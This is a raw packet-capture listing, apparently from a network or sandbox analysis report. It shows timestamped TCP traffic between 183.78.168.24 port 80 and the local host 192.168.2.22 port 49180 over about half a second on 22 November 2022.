                                                                                Nov 22, 2022 05:10:31.659697056 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:31.659735918 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:31.659753084 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:31.659833908 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:31.659874916 CET4918080192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:31.659898043 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:31.659970999 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:31.660012007 CET4918080192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:31.660048008 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:31.660162926 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:31.660245895 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:31.660284996 CET4918080192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:31.660334110 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:31.660406113 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:31.660530090 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:31.660573959 CET4918080192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:31.660609961 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:31.660715103 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:31.660782099 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:31.660821915 CET4918080192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:31.660841942 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:31.660928965 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:31.661078930 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:31.661115885 CET4918080192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:31.661129951 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:31.661248922 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:31.661382914 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:31.661400080 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:31.661423922 CET4918080192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:31.661503077 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:31.661541939 CET4918080192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:31.661564112 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:31.661662102 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:31.661760092 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:31.661797047 CET4918080192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:31.661859035 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:31.661921024 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:31.662050009 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:31.662086964 CET4918080192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:31.662122011 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:31.662275076 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:31.662292004 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:31.662331104 CET4918080192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:31.662395000 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:31.662442923 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:31.662542105 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:31.662585020 CET4918080192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:31.662662029 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:31.662714958 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:31.662851095 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:31.662894964 CET4918080192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:31.662916899 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:31.663016081 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:31.663472891 CET4918080192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:31.665311098 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:31.665414095 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:31.665488958 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:31.665529013 CET4918080192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:31.665616035 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:31.665860891 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:31.665961981 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:31.665998936 CET4918080192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:31.666057110 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:31.666152000 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:31.666208029 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:31.666246891 CET4918080192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:31.666266918 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:31.666409016 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:31.666471958 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:31.666510105 CET4918080192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:31.666573048 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:31.666614056 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:31.666757107 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:31.666793108 CET4918080192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:31.666851044 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:31.666944027 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:31.666984081 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:31.667022943 CET4918080192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:31.667084932 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:31.667201042 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:31.667259932 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:31.667296886 CET4918080192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:31.667316914 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:31.710732937 CET4918080192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:31.814275026 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:31.814312935 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:31.814325094 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:31.814336061 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:31.814346075 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:31.814380884 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:31.814532042 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:31.814585924 CET4918080192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:31.814637899 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:31.814683914 CET4918080192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:31.814701080 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:31.814773083 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:31.814841032 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:31.814886093 CET4918080192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:31.815216064 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:31.815378904 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:31.815471888 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:31.815490961 CET4918080192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:31.815515041 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:31.815634012 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:31.815680027 CET4918080192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:31.815730095 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:31.815819025 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:31.815939903 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:31.815982103 CET4918080192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:31.815994024 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:31.816032887 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:31.816126108 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:31.816169024 CET4918080192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:31.816251993 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:31.816335917 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:31.816422939 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:31.816466093 CET4918080192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:31.816509962 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:31.816550970 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:31.816590071 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:31.816627979 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:31.816631079 CET4918080192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:31.816668987 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:31.819453001 CET4918080192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:31.819484949 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:31.841387987 CET4918080192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:31.865142107 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:31.865304947 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:31.865346909 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:31.865362883 CET4918080192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:31.865410089 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:31.865453959 CET4918080192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:31.865487099 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:31.865525961 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:31.865565062 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:31.865567923 CET4918080192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:31.865622997 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:31.865662098 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:31.865665913 CET4918080192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:31.865716934 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:31.865758896 CET4918080192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:31.865775108 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:31.865814924 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:31.865853071 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:31.865854979 CET4918080192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:31.865914106 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:31.865955114 CET4918080192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:31.865963936 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:31.866095066 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:31.866136074 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:31.866136074 CET4918080192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:31.866230011 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:31.866271973 CET4918080192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:31.866327047 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:31.866383076 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:31.866424084 CET4918080192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:31.866513968 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:31.866564989 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:31.866609097 CET4918080192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:31.866686106 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:31.866775036 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:31.866816044 CET4918080192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:31.866863966 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:31.866976976 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:31.867017984 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:31.867017984 CET4918080192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:31.867141962 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:31.867198944 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:31.867212057 CET4918080192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:31.867290974 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:31.867331982 CET4918080192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:31.867379904 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:31.968924046 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:31.969055891 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:31.969099045 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:31.969125986 CET4918080192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:31.969156981 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:31.969216108 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:31.969254971 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:31.969259024 CET4918080192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:31.969310045 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:31.969348907 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:31.969387054 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:31.969388008 CET4918080192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:31.969425917 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:31.970491886 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:31.970535994 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:31.970539093 CET4918080192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:31.973479033 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:31.975464106 CET4918080192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:31.995847940 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:31.995961905 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:31.996023893 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:31.996064901 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:31.996082067 CET4918080192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:31.996103048 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:31.996145964 CET4918080192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:31.996157885 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:31.996225119 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:31.996263981 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:31.996304035 CET4918080192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:31.996316910 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:31.996372938 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:31.996412992 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:31.996452093 CET4918080192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:31.996535063 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:31.996678114 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:31.996733904 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:31.996773958 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:31.996773958 CET4918080192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:31.996865034 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:31.996951103 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:31.996989965 CET4918080192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:32.020059109 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:32.020184040 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:32.020226002 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:32.020265102 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:32.020306110 CET4918080192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:32.020320892 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:32.020354033 CET4918080192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:32.020366907 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:32.020431995 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:32.020471096 CET4918080192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:32.020473957 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:32.020606041 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:32.020657063 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:32.020695925 CET4918080192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:32.020750999 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:32.020889997 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:32.020931005 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:32.020972013 CET4918080192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:32.021045923 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:32.021096945 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:32.021190882 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:32.021231890 CET4918080192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:32.021281958 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:32.021338940 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:32.021430969 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:32.021471977 CET4918080192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:32.021549940 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:32.021605015 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:32.021701097 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:32.021740913 CET4918080192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:32.021857977 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:32.021960020 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:32.022006989 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:32.022047997 CET4918080192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:32.022066116 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:32.022120953 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:32.022211075 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:32.022250891 CET4918080192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:32.022365093 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:32.022464991 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:32.023143053 CET4918080192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:32.024595022 CET4918080192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:32.123656988 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:32.123747110 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:32.123790979 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:32.123837948 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:32.123883963 CET4918080192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:32.123884916 CET4918080192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:32.123908043 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:32.123956919 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:32.124007940 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:32.124047995 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:32.124058962 CET4918080192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:32.124104023 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:32.124252081 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:32.124305964 CET4918080192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:32.124459028 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:32.124501944 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:32.126967907 CET4918080192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:32.129692078 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:32.129750967 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:32.130780935 CET4918080192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:32.150676012 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:32.150728941 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:32.150863886 CET4918080192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:32.174712896 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:32.178575039 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:32.178617954 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:32.178709984 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:32.178771019 CET4918080192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:32.178786039 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:32.178898096 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:32.179047108 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:32.179101944 CET4918080192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:32.179107904 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:32.179151058 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:32.179152966 CET4918080192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:32.179248095 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:32.179300070 CET4918080192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:32.179303885 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:32.179395914 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:32.179539919 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:32.179579973 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:32.179590940 CET4918080192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:32.179667950 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:32.179790020 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:32.179929018 CET4918080192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:32.179980040 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:32.180032969 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:32.180090904 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:32.180136919 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:32.180150032 CET4918080192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:32.180191040 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:32.180321932 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:32.180378914 CET4918080192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:32.180378914 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:32.180476904 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:32.180533886 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:32.180591106 CET4918080192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:32.180638075 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:32.180747986 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:32.180824995 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:32.180874109 CET4918080192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:32.180907011 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:32.180999994 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:32.181134939 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:32.181188107 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:32.181190014 CET4918080192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:32.181284904 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:32.181340933 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:32.181392908 CET4918080192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:32.181437969 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:32.181562901 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:32.181603909 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:32.181663036 CET4918080192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:32.181709051 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:32.181803942 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:32.181859970 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:32.181912899 CET4918080192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:32.181937933 CET8049180183.78.168.24192.168.2.22
